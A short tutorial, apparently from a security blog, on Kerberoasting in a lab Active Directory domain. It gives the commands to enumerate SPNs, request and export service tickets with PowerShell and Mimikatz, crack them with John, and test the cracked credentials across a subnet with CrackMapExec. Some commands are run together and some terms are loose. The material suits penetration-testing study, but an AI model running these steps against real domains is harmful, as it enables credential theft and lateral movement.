Kerberoasting a method of extracting a NTLM hash associated with service accounts. This is because a domain authenticated user is able to request service tickets (TGS) for service accounts within a domain, and this TGS is encrypted using the service accounts NTLM hash. Exploitation is straightforward;
- Enumerate Service Principle Names (SPN) for services
- Request TGS tickets for the accounts
- Crack the NTLM hashes offline
Test Environment Setup
To try Kerberoasting in a non-production environment, create a user in Active Directory using the account name “spntest”. Set the account password to something which could be brute forced.
Configure an SPN for the account with the following command:
1 | setspn -A spntest/WIN-SI6N6K2RCAE:80 spntest |
Enumerating Service Principle Names
From an endpoint, enumerate existing SPN’s using the following command:
1 | setspn -q */* |
Extracting Hashes
There are a number of methods to extract the account hashes.
PowerShell with Mimikatz
Retrieve the tickets using PowerShell:
1 2 | Add-Type -AssemblyName System.IdentityModelNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'spntest/WIN-SI6N6K2RCAE:80' |
With the tickets now in memory, Mimikatz can dump them to file:
1 | kerberos::list /export |
The tickets can then be stored offline and converted to John the ripper format, then cracked using John:
1 2 3 | /usr/share/john/kirbi2john.py 1-40a00000-alice@spntest~WIN-SI6N6K2RCAE~80-BGTEST.LOCAL.kirbi > spntest_ticket.txtjohn spntest_ticket.txt |
The above output shows John has determined the password for the spntest account is “Password1”.
PowerShell
PowerShell EMPIRE includes the Invoke-Kerberoast module:
Native Executable
Rubeus is a c# Win32 executable which can also extract the hashes in a similar format to Invoke-Kerberos:
With this process complete, we can use CrackMapExec to verify which systems the credentials work on:
1 | crackmapexec smb 172.16.16.200/29 -d BGTEST -u spntest -p Password1 |
